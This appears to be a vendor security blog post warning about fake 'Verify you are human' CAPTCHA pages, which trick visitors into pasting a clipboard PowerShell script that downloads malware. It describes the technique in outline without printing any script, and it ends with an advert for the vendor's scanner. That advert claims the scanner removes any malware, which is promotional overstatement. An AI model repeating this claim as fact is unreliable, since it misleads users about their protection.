While browsing the Web, you can occasionally get to a page that says “Verify you are human”, and offers doing certain manipulations with PowerShell or Command Prompt. These pages are, in fact, scams that aim at deploying malicious software or unwanted programs to your system. Let me explain how they work and how to avoid them in future.
What is Verify you are human scam?
“Verify you are human” is a chain of malignant websites that trick visitors into downloading and running malicious programs. As you could have guessed by the name, they mimic CAPTCHA pages, but in fact have nothing in common with normal human verification sites. Their methods mainly target people who are not aware about how the verification works normally.
Most often, users get to such pages after clicking a certain part on a shady website, like a page with pirated movies or unlicensed software. Frauds who maintain such websites stuff every interactive element with redirections, that throw visitors to malicious pages of various kinds. As the redirect happens to the same tab, Verify you are human scam pages are really convincing for unsuspecting users.
We earlier wrote how Lumma Stealer spreads through such fake verification sites. It covers quite an extensive fraudulent scheme that attacks hundreds of people each day – consider checking it out.
How does this scam work?
On the Verify you are Human page, the user sees just a button saying “I am not a robot”. Upon clicking it, the button changes to a request to open PowerShell (or, in some cases, Command Prompt), press Ctrl+V combination and Enter. But inside, users get a malicious script copied to the clipboard when they click the first button. Below, you can see our analysis of such a script:
Once they paste that script into PowerShell, the main course of attack happens. This script contains base64-encoded instructions to connect the remote server, download a file and run it. Obviously, there’s no hope any of the files downloaded that way will be legitimate. Here is the short list of malware types that can infect computers in such a way:
Malicious browser extensions. This is a type of virus that has become massively widespread over the last few months. Their key purpose is intercepting search queries and throwing the user to a no-name search engine, with the results riddled with advertisements. Additionally, such plugins appear to collect personal information about the user, that the browser keeps for auto fill forms.
I’ve covered several malicious browser extensions that were enormously widespread a few weeks ago. If you are interested in learning more about such threats, here is the article about PrimeLookup browser extension.
Infostealer or backdoor malware. These are among the most dangerous malware types, due to stealthiness and delayed damage potential. It is hard to notice the symptoms of their activity, but later, one can see online accounts being stolen. Backdoors can also selectively steal specific files and provide remote access to the computer.
Unwanted programs. The variety of this type is vast: from fake system optimizers to “advanced search bars” that hijack the web browser and act pretty much like the said malicious browser extensions. They rarely hide their presence, and, quite contrary, try convincing the user about being tremendously useful.
How to delete malware?
If you have interacted with a Verify you are human scam page, chances are, there is a pesky malware running in the system. To get rid of it and any of its traces, consider running a Full scan with GridinSoft Anti-Malware. This program will quickly delete any malicious program, regardless of their source and form. And there is a free trial option, too – no card info needed. Click the banner below and get your system cleaned up.
To avoid getting to such websites in future, you can block redirections completely, so no website will be able to pull you into another dirty scam. Disabling redirects is a rather simple process, here is a step by step guide for Google Chrome and Chromium-based browsers:
- Step 1. Open Chrome, then go to the Settings tab. Here, opt for the Privacy and Security tab in the left menu.
- Step 2. All the way down, you will see the Site Settings menu. Click it, and scroll down to Popups and Redirect part.
- Step 3. In here, set the Default behavior to “Don’t allow sites to send popups or use redirects”. This setting will block the redirections, and, as a bonus, disable push notifications.